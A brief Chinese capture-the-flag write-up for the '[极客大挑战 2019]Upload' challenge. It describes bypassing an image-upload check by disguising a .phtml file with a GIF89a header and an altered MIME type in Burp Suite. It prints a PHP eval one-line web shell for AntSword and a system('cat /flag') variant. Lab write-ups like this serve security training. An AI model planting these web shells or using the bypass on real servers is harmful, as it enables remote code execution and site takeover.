[极客大挑战 2019]Upload

简单的文件上传漏洞题目

题目要求上传图片那我们就考虑上传一个phtml文件，然后抓包改下上传文件的类型

将里面的内容改为一句话木马，为我们后面的蚁剑连接做准备

GIF89a
<script language="php">eval($_POST['hhz']);</script> 

上面的头是gif的文件头，用来对应对文件的扫描

我们将它上传，使用bp截取，修改一下格式（image/jpeg），再放行

然后直接蚁剑连接就好了，文件应该保存在http://f9c87aea-a976-43d2-af3c-911df1363459.node4.buuoj.cn:81/upload/shell.phtml

所以我们也是直接连接这个网站

 

也可以用cat /flag的一句话木马  <script language='php'>system('cat /flag');</script>

这样直接打开那个保存的网站就可以直接得到flag